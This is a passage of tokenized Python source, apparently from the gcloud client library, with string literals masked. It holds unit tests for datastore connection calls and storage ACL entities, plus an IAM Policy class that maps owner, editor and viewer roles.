_generated import datastore_pb2 <EOL> from gcloud . datastore . _generated import query_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> KIND = '<STR_LIT>' <EOL> CURSOR = b'<STR_LIT:\x00>' <EOL> TRANSACTION = b'<STR_LIT>' <EOL> q_pb = self . _make_query_pb ( KIND ) <EOL> rsp_pb = datastore_pb2 . RunQueryResponse ( ) <EOL> rsp_pb . batch . end_cursor = CURSOR <EOL> no_more = query_pb2 . QueryResultBatch . NO_MORE_RESULTS <EOL> rsp_pb . batch . more_results = no_more <EOL> rsp_pb . batch . entity_result_type = query_pb2 . EntityResult . FULL <EOL> conn = self . _makeOne ( ) <EOL> self . assertRaises ( ValueError , conn . run_query , PROJECT , q_pb , <EOL> eventual = True , transaction_id = TRANSACTION ) <EOL> def test_run_query_wo_namespace_empty_result ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> from gcloud . datastore . _generated import query_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> KIND = '<STR_LIT>' <EOL> CURSOR = b'<STR_LIT:\x00>' <EOL> q_pb = self . _make_query_pb ( KIND ) <EOL> rsp_pb = datastore_pb2 . RunQueryResponse ( ) <EOL> rsp_pb . batch . end_cursor = CURSOR <EOL> no_more = query_pb2 . QueryResultBatch . NO_MORE_RESULTS <EOL> rsp_pb . batch . more_results = no_more <EOL> rsp_pb . batch . entity_result_type = query_pb2 . EntityResult . FULL <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> pbs , end , more , skipped = conn . run_query ( PROJECT , q_pb ) <EOL> self . assertEqual ( pbs , [ ] ) <EOL> self . assertEqual ( end , CURSOR ) <EOL> self . assertTrue ( more ) <EOL> self . assertEqual ( skipped , <NUM_LIT:0> ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . RunQueryRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> self . assertEqual ( request . partition_id . namespace_id , '<STR_LIT>' ) <EOL> self . assertEqual ( request . query , q_pb ) <EOL> def test_run_query_w_namespace_nonempty_result ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> from gcloud . datastore . _generated import entity_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> KIND = '<STR_LIT>' <EOL> entity = entity_pb2 . Entity ( ) <EOL> q_pb = self . _make_query_pb ( KIND ) <EOL> rsp_pb = datastore_pb2 . RunQueryResponse ( ) <EOL> rsp_pb . batch . entity_results . add ( entity = entity ) <EOL> rsp_pb . batch . entity_result_type = <NUM_LIT:1> <EOL> rsp_pb . batch . more_results = <NUM_LIT:3> <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> pbs = conn . run_query ( PROJECT , q_pb , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( len ( pbs ) , <NUM_LIT:1> ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . RunQueryRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> self . assertEqual ( request . partition_id . namespace_id , '<STR_LIT>' ) <EOL> self . assertEqual ( request . query , q_pb ) <EOL> def test_begin_transaction ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> TRANSACTION = b'<STR_LIT>' <EOL> rsp_pb = datastore_pb2 . BeginTransactionResponse ( ) <EOL> rsp_pb . transaction = TRANSACTION <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> self . assertEqual ( conn . begin_transaction ( PROJECT ) , TRANSACTION ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . BeginTransactionRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> def test_commit_wo_transaction ( self ) : <EOL> from gcloud . _testing import _Monkey <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> from gcloud . datastore import connection as MUT <EOL> from gcloud . datastore . helpers import _new_value_pb <EOL> PROJECT = '<STR_LIT>' <EOL> key_pb = self . _make_key_pb ( PROJECT ) <EOL> rsp_pb = datastore_pb2 . CommitResponse ( ) <EOL> req_pb = datastore_pb2 . CommitRequest ( ) <EOL> mutation = req_pb . mutations . add ( ) <EOL> insert = mutation . upsert <EOL> insert . key . CopyFrom ( key_pb ) <EOL> value_pb = _new_value_pb ( insert , '<STR_LIT:foo>' ) <EOL> value_pb . string_value = u'<STR_LIT>' <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> expected_result = object ( ) <EOL> _parsed = [ ] <EOL> def mock_parse ( response ) : <EOL> _parsed . append ( response ) <EOL> return expected_result <EOL> with _Monkey ( MUT , _parse_commit_response = mock_parse ) : <EOL> result = conn . commit ( PROJECT , req_pb , None ) <EOL> self . assertTrue ( result is expected_result ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . CommitRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> self . assertEqual ( request . transaction , b'<STR_LIT>' ) <EOL> self . assertEqual ( list ( request . mutations ) , [ mutation ] ) <EOL> self . assertEqual ( request . mode , rq_class . NON_TRANSACTIONAL ) <EOL> self . assertEqual ( _parsed , [ rsp_pb ] ) <EOL> def test_commit_w_transaction ( self ) : <EOL> from gcloud . _testing import _Monkey <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> from gcloud . datastore import connection as MUT <EOL> from gcloud . datastore . helpers import _new_value_pb <EOL> PROJECT = '<STR_LIT>' <EOL> key_pb = self . _make_key_pb ( PROJECT ) <EOL> rsp_pb = datastore_pb2 . CommitResponse ( ) <EOL> req_pb = datastore_pb2 . CommitRequest ( ) <EOL> mutation = req_pb . mutations . add ( ) <EOL> insert = mutation . upsert <EOL> insert . key . CopyFrom ( key_pb ) <EOL> value_pb = _new_value_pb ( insert , '<STR_LIT:foo>' ) <EOL> value_pb . string_value = u'<STR_LIT>' <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> expected_result = object ( ) <EOL> _parsed = [ ] <EOL> def mock_parse ( response ) : <EOL> _parsed . append ( response ) <EOL> return expected_result <EOL> with _Monkey ( MUT , _parse_commit_response = mock_parse ) : <EOL> result = conn . commit ( PROJECT , req_pb , b'<STR_LIT>' ) <EOL> self . assertTrue ( result is expected_result ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . CommitRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> self . assertEqual ( request . transaction , b'<STR_LIT>' ) <EOL> self . assertEqual ( list ( request . mutations ) , [ mutation ] ) <EOL> self . assertEqual ( request . mode , rq_class . TRANSACTIONAL ) <EOL> self . assertEqual ( _parsed , [ rsp_pb ] ) <EOL> def test_rollback_ok ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> TRANSACTION = b'<STR_LIT>' <EOL> rsp_pb = datastore_pb2 . RollbackResponse ( ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> self . assertEqual ( conn . rollback ( PROJECT , TRANSACTION ) , None ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . RollbackRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> self . assertEqual ( request . transaction , TRANSACTION ) <EOL> def test_allocate_ids_empty ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> rsp_pb = datastore_pb2 . AllocateIdsResponse ( ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> self . assertEqual ( conn . allocate_ids ( PROJECT , [ ] ) , [ ] ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . AllocateIdsRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> self . assertEqual ( list ( request . keys ) , [ ] ) <EOL> def test_allocate_ids_non_empty ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> before_key_pbs = [ <EOL> self . _make_key_pb ( PROJECT , id_ = None ) , <EOL> self . _make_key_pb ( PROJECT , id_ = None ) , <EOL> ] <EOL> after_key_pbs = [ <EOL> self . _make_key_pb ( PROJECT ) , <EOL> self . _make_key_pb ( PROJECT , id_ = <NUM_LIT> ) , <EOL> ] <EOL> rsp_pb = datastore_pb2 . AllocateIdsResponse ( ) <EOL> rsp_pb . keys . add ( ) . CopyFrom ( after_key_pbs [ <NUM_LIT:0> ] ) <EOL> rsp_pb . keys . add ( ) . CopyFrom ( after_key_pbs [ <NUM_LIT:1> ] ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> self . assertEqual ( conn . allocate_ids ( PROJECT , before_key_pbs ) , <EOL> after_key_pbs ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . AllocateIdsRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> self . assertEqual ( len ( request . keys ) , len ( before_key_pbs ) ) <EOL> for key_before , key_after in zip ( before_key_pbs , request . keys ) : <EOL> self . assertEqual ( key_before , key_after ) <EOL> class Test__parse_commit_response ( unittest2 . TestCase ) : <EOL> def _callFUT ( self , commit_response_pb ) : <EOL> from gcloud . datastore . connection import _parse_commit_response <EOL> return _parse_commit_response ( commit_response_pb ) <EOL> def test_it ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> from gcloud . datastore . _generated import entity_pb2 <EOL> index_updates = <NUM_LIT> <EOL> keys = [ <EOL> entity_pb2 . Key ( <EOL> path = [ <EOL> entity_pb2 . Key . PathElement ( <EOL> kind = '<STR_LIT>' , <EOL> id = <NUM_LIT> , <EOL> ) , <EOL> ] , <EOL> ) , <EOL> entity_pb2 . Key ( <EOL> path = [ <EOL> entity_pb2 . Key . PathElement ( <EOL> kind = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> ] , <EOL> ) , <EOL> ] <EOL> response = datastore_pb2 . CommitResponse ( <EOL> mutation_results = [ <EOL> datastore_pb2 . MutationResult ( key = key ) for key in keys <EOL> ] , <EOL> index_updates = index_updates , <EOL> ) <EOL> result = self . _callFUT ( response ) <EOL> self . assertEqual ( result , ( index_updates , keys ) ) <EOL> class Http ( object ) : <EOL> _called_with = None <EOL> def __init__ ( self , headers , content ) : <EOL> from httplib2 import Response <EOL> self . _response = Response ( headers ) <EOL> self . _content = content <EOL> def request ( self , ** kw ) : <EOL> self . _called_with = kw <EOL> return self . _response , self . _content <EOL> class _PathElementProto ( object ) : <EOL> def __init__ ( self , _id ) : <EOL> self . id = _id <EOL> class _KeyProto ( object ) : <EOL> def __init__ ( self , id_ ) : <EOL> self . path = [ _PathElementProto ( id_ ) ] </s>
<s> import unittest2 <EOL> class Test_logger_name_from_path ( unittest2 . TestCase ) : <EOL> def _callFUT ( self , path , project ) : <EOL> from gcloud . logging . _helpers import logger_name_from_path <EOL> return logger_name_from_path ( path , project ) <EOL> def test_w_simple_name ( self ) : <EOL> LOGGER_NAME = '<STR_LIT>' <EOL> PROJECT = '<STR_LIT>' <EOL> PATH = '<STR_LIT>' % ( PROJECT , LOGGER_NAME ) <EOL> logger_name = self . _callFUT ( PATH , PROJECT ) <EOL> self . assertEqual ( logger_name , LOGGER_NAME ) <EOL> def test_w_name_w_all_extras ( self ) : <EOL> LOGGER_NAME = '<STR_LIT>' <EOL> PROJECT = '<STR_LIT>' <EOL> PATH = '<STR_LIT>' % ( PROJECT , LOGGER_NAME ) <EOL> logger_name = self . _callFUT ( PATH , PROJECT ) <EOL> self . assertEqual ( logger_name , LOGGER_NAME ) </s>
<s> """<STR_LIT>""" <EOL> OWNER_ROLE = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> EDITOR_ROLE = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> VIEWER_ROLE = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> class Policy ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , etag = None , version = None ) : <EOL> self . etag = etag <EOL> self . version = version <EOL> self . owners = set ( ) <EOL> self . editors = set ( ) <EOL> self . viewers = set ( ) <EOL> @ staticmethod <EOL> def user ( email ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( email , ) <EOL> @ staticmethod <EOL> def service_account ( email ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( email , ) <EOL> @ staticmethod <EOL> def group ( email ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( email , ) <EOL> @ staticmethod <EOL> def domain ( domain ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( domain , ) <EOL> @ staticmethod <EOL> def all_users ( ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' <EOL> @ staticmethod <EOL> def authenticated_users ( ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' <EOL> @ classmethod <EOL> def from_api_repr ( cls , resource ) : <EOL> """<STR_LIT>""" <EOL> version = resource . get ( '<STR_LIT:version>' ) <EOL> etag = resource . get ( '<STR_LIT>' ) <EOL> policy = cls ( etag , version ) <EOL> for binding in resource . get ( '<STR_LIT>' , ( ) ) : <EOL> role = binding [ '<STR_LIT>' ] <EOL> members = set ( binding [ '<STR_LIT>' ] ) <EOL> if role == OWNER_ROLE : <EOL> policy . owners = members <EOL> elif role == EDITOR_ROLE : <EOL> policy . editors = members <EOL> elif role == VIEWER_ROLE : <EOL> policy . viewers = members <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % ( role , ) ) <EOL> return policy <EOL> def to_api_repr ( self ) : <EOL> """<STR_LIT>""" <EOL> resource = { } <EOL> if self . etag is not None : <EOL> resource [ '<STR_LIT>' ] = self . etag <EOL> if self . version is not None : <EOL> resource [ '<STR_LIT:version>' ] = self . version <EOL> bindings = [ ] <EOL> if self . owners : <EOL> bindings . append ( <EOL> { '<STR_LIT>' : OWNER_ROLE , '<STR_LIT>' : sorted ( self . owners ) } ) <EOL> if self . editors : <EOL> bindings . append ( <EOL> { '<STR_LIT>' : EDITOR_ROLE , '<STR_LIT>' : sorted ( self . editors ) } ) <EOL> if self . viewers : <EOL> bindings . append ( <EOL> { '<STR_LIT>' : VIEWER_ROLE , '<STR_LIT>' : sorted ( self . viewers ) } ) <EOL> if bindings : <EOL> resource [ '<STR_LIT>' ] = bindings <EOL> return resource </s>
<s> import unittest2 <EOL> class Test_ACLEntity ( unittest2 . TestCase ) : <EOL> def _getTargetClass ( self ) : <EOL> from gcloud . storage . acl import _ACLEntity <EOL> return _ACLEntity <EOL> def _makeOne ( self , * args , ** kw ) : <EOL> return self . _getTargetClass ( ) ( * args , ** kw ) <EOL> def test_ctor_default_identifier ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> self . assertEqual ( entity . type , TYPE ) <EOL> self . assertEqual ( entity . identifier , None ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( ) ) <EOL> def test_ctor_w_identifier ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> entity = self . _makeOne ( TYPE , ID ) <EOL> self . assertEqual ( entity . type , TYPE ) <EOL> self . assertEqual ( entity . identifier , ID ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( ) ) <EOL> def test___str__no_identifier ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> self . assertEqual ( str ( entity ) , TYPE ) <EOL> def test___str__w_identifier ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> entity = self . _makeOne ( TYPE , ID ) <EOL> self . assertEqual ( str ( entity ) , '<STR_LIT>' % ( TYPE , ID ) ) <EOL> def test_grant_simple ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ROLE = '<STR_LIT>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . grant ( ROLE ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( [ ROLE ] ) ) <EOL> def test_grant_duplicate ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ROLE1 = '<STR_LIT>' <EOL> ROLE2 = '<STR_LIT>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . grant ( ROLE1 ) <EOL> entity . grant ( ROLE2 ) <EOL> entity . grant ( ROLE1 ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( [ ROLE1 , ROLE2 ] ) ) <EOL> def test_revoke_miss ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ROLE = '<STR_LIT>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . revoke ( ROLE ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( ) ) <EOL> def test_revoke_hit ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ROLE1 = '<STR_LIT>' <EOL> ROLE2 = '<STR_LIT>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . grant ( ROLE1 ) <EOL> entity . grant ( ROLE2 ) <EOL> entity . revoke ( ROLE1 ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( [ ROLE2 ] ) ) <EOL> def test_grant_read ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . grant_read ( ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( [ entity . READER_ROLE ] ) ) <EOL> def test_grant_write ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . grant_write ( ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( [ entity . WRITER_ROLE ] ) ) <EOL> def test_grant_owner ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . grant_owner ( ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( [ entity . OWNER_ROLE ] ) ) <EOL> def test_revoke_read ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . grant ( entity . READER_ROLE ) <EOL> entity . revoke_read ( ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( ) ) <EOL> def test_revoke_write ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . grant ( entity . WRITER_ROLE ) <EOL> entity . revoke_write ( ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( ) ) <EOL> def test_revoke_owner ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . grant ( entity . OWNER_ROLE ) <EOL> entity . revoke_owner ( ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( ) ) <EOL> class Test_ACL ( unittest2 . TestCase ) : <EOL> def _getTargetClass ( self ) : <EOL> from gcloud . storage . acl import ACL <EOL> return ACL <EOL> def _makeOne ( self , * args , ** kw ) : <EOL> return self . _getTargetClass ( ) ( * args , ** kw ) <EOL> def test_ctor ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> self . assertEqual ( acl . entities , { } ) <EOL> self . assertFalse ( acl . loaded ) <EOL> def test__ensure_loaded ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> def _reload ( ) : <EOL> acl . _really_loaded = True <EOL> acl . reload = _reload <EOL> acl . _ensure_loaded ( ) <EOL> self . assertTrue ( acl . _really_loaded ) <EOL> def test_client_is_abstract ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> self . assertRaises ( NotImplementedError , lambda : acl . client ) <EOL> def test_reset ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> acl . entity ( TYPE , ID ) <EOL> acl . reset ( ) <EOL> self . assertEqual ( acl . entities , { } ) <EOL> self . assertFalse ( acl . loaded ) <EOL> def test___iter___empty_eager ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> self . assertEqual ( list ( acl ) , [ ] ) <EOL> def test___iter___empty_lazy ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> def _reload ( ) : <EOL> acl . loaded = True <EOL> acl . reload = _reload <EOL> self . assertEqual ( list ( acl ) , [ ] ) <EOL> self . assertTrue ( acl . loaded ) <EOL> def test___iter___non_empty_no_roles ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> acl . entity ( TYPE , ID ) <EOL> self . assertEqual ( list ( acl ) , [ ] ) <EOL> def test___iter___non_empty_w_roles ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . entity ( TYPE , ID ) <EOL> entity . grant ( ROLE ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' % ( TYPE , ID ) , '<STR_LIT>' : ROLE } ] ) <EOL> def test___iter___non_empty_w_empty_role ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . entity ( TYPE , ID ) <EOL> entity . grant ( '<STR_LIT>' ) <EOL> self . assertEqual ( list ( acl ) , [ ] ) <EOL> def test_entity_from_dict_allUsers_eager ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . entity_from_dict ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ) <EOL> self . assertEqual ( entity . type , '<STR_LIT>' ) <EOL> self . assertEqual ( entity . identifier , None ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( [ ROLE ] ) ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> self . assertEqual ( list ( acl . get_entities ( ) ) , [ entity ] ) <EOL> def test_entity_from_dict_allAuthenticatedUsers ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . entity_from_dict ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ROLE } ) <EOL> self . assertEqual ( entity . type , '<STR_LIT>' ) <EOL> self . assertEqual ( entity . identifier , None ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( [ ROLE ] ) ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> self . assertEqual ( list ( acl . get_entities ( ) ) , [ entity ] ) <EOL> def test_entity_from_dict_string_w_hyphen ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . entity_from_dict ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ) <EOL> self . assertEqual ( entity . type , '<STR_LIT:type>' ) <EOL> self . assertEqual ( entity . identifier , '<STR_LIT:id>' ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( [ ROLE ] ) ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> self . assertEqual ( list ( acl . get_entities ( ) ) , [ entity ] ) <EOL> def test_entity_from_dict_string_wo_hyphen ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> self . assertRaises ( ValueError , <EOL> acl . entity_from_dict , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ) <EOL> self . assertEqual ( list ( acl . get_entities ( ) ) , [ ] ) <EOL> def test_has_entity_miss_str_eager ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> self . assertFalse ( acl . has_entity ( '<STR_LIT>' ) ) <EOL> def test_has_entity_miss_str_lazy ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> def _reload ( ) : <EOL> acl . loaded = True <EOL> acl . reload = _reload <EOL> self . assertFalse ( acl . has_entity ( '<STR_LIT>' ) ) <EOL> self . assertTrue ( acl . loaded ) <EOL> def test_has_entity_miss_entity ( self ) : <EOL> from gcloud . storage . acl import _ACLEntity <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> entity = _ACLEntity ( TYPE , ID ) <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> self . assertFalse ( acl . has_entity ( entity ) ) <EOL> def test_has_entity_hit_str ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> acl . entity ( TYPE , ID ) <EOL> self . assertTrue ( acl . has_entity ( '<STR_LIT>' % ( TYPE , ID ) ) ) <EOL> def test_has_entity_hit_entity ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . entity ( TYPE , ID ) <EOL> self . assertTrue ( acl . has_entity ( entity ) ) <EOL> def test_get_entity_miss_str_no_default_eager ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> self . assertEqual ( acl . get_entity ( '<STR_LIT>' ) , None ) <EOL> def test_get_entity_miss_str_no_default_lazy ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> def _reload ( ) : <EOL> acl . loaded = True <EOL> acl . reload = _reload <EOL> self . assertEqual ( acl . get_entity ( '<STR_LIT>' ) , None ) <EOL> self . assertTrue ( acl . loaded ) <EOL> def test_get_entity_miss_entity_no_default ( self ) : <EOL> from gcloud . storage . acl import _ACLEntity <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> entity = _ACLEntity ( TYPE , ID ) <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> self . assertEqual ( acl . get_entity ( entity ) , None ) <EOL> def test_get_entity_miss_str_w_default ( self ) : <EOL> DEFAULT = object ( ) <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> self . assertTrue ( acl . get_entity ( 